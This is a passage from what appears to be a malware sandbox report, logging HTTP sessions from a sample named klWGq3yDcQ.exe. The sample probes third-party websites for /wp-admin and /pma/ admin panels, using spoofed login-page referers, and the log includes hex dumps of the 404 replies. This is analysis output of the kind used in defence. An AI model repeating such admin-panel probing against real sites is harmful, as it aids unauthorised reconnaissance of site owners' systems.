                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978378.6651035949534415191Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    227192.168.2.46085934.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC220OUTGET /wp-admin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.2brospw.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1086INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 38 2e 36 38 31 31 30 33 35 39 38 39 30 30 36 34 30 32 35 38 38 31 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978378.68110359890064025881Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10X-Content-Type-Opti
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC166INData Raw: 62 33 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63
                                                                                                                                                                                                    Data Ascii: b31 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20
                                                                                                                                                                                                    Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39
                                                                                                                                                                                                    Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC207INData Raw: 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    228192.168.2.46084534.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC222OUTGET /en/wp-admin HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.dstaq.com/en/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1079INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 37 38 2e 36 36 38 31 30 33 32 38 32 33 34 33 35 32 32 31 38 30 37 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978378.6681032823435221807Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC173INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                    Data Ascii: scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1252INData Raw: 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65
                                                                                                                                                                                                    Data Ascii: party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/e
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    229192.168.2.46073745.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC168OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC688INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: openrestyDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-cache, must-revalidate, max-age=0content-security-policy: up
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC14772INData Raw: 33 39 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 62 74 2d 74 68 65 6d 65 3d 22 4c 61 77 20 46 69 72 6d 20 31 2e 30 2e 36 22 3e 0a 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70
                                                                                                                                                                                                    Data Ascii: 39ac<!DOCTYPE html><html class="no-js" lang="en-US" data-bt-theme="Law Firm 1.0.6"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><meta name="mobile-web-ap
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16328INData Raw: 33 66 63 30 0d 0a 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70
                                                                                                                                                                                                    Data Ascii: 3fc0nge) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--p
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16320INData Raw: 33 66 62 38 0d 0a 35 2c 2e 35 29 20 69 6e 73 65 74 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 31 70 78 20 23 36 36 32 64 39 31 20 69 6e 73 65 74 2c 30 20 30 20 30 20 32 65 6d 20 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 35 29 20 69 6e 73 65 74 3b 20 63 6f 6c 6f 72 3a 20 23 36 36 32 64 39 31 3b 7d 20 74 61 62 6c 65 2e 73 68 6f 70 5f 74 61 62 6c 65 20 2e 63 6f 75 70 6f 6e 20 2e 69 6e 70 75 74 2d 74 65 78 74 7b 20 63 6f 6c 6f 72 3a 20 23 36 36 32 64 39 31 3b 7d 20 74 61 62 6c 65 2e 73 68 6f 70 5f 74 61 62 6c 65 20 74 64 2e 70 72 6f 64 75 63 74 2d 72 65 6d 6f 76 65 20 61 2e 72 65 6d 6f 76 65 7b 20 63 6f 6c 6f 72 3a 20 23 36 36 32 64 39 31 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 31 70 78
                                                                                                                                                                                                    Data Ascii: 3fb85,.5) inset; box-shadow: 0 0 0 1px #662d91 inset,0 0 0 2em rgba(255,255,255,.5) inset; color: #662d91;} table.shop_table .coupon .input-text{ color: #662d91;} table.shop_table td.product-remove a.remove{ color: #662d91; -webkit-box-shadow: 0 0 0 1px
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC64INData Raw: 33 64 66 36 0d 0a 2e 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 63 6f
                                                                                                                                                                                                    Data Ascii: 3df6.2" /><link rel="icon" href="https://engel-firm.com/wp-co
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC15806INData Raw: 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 36 2f 63 72 6f 70 70 65 64 2d 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 36 2f 63 72 6f 70 70 65 64 2d 66 61 76 69 63 6f 6e 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: ntent/uploads/2023/06/cropped-favicon-32x32.png" sizes="32x32" /><link rel="icon" href="https://engel-firm.com/wp-content/uploads/2023/06/cropped-favicon-192x192.png" sizes="192x192" /><link rel="apple-touch-icon" href="https://engel-firm.com/wp-content
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    230192.168.2.461135104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC333OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
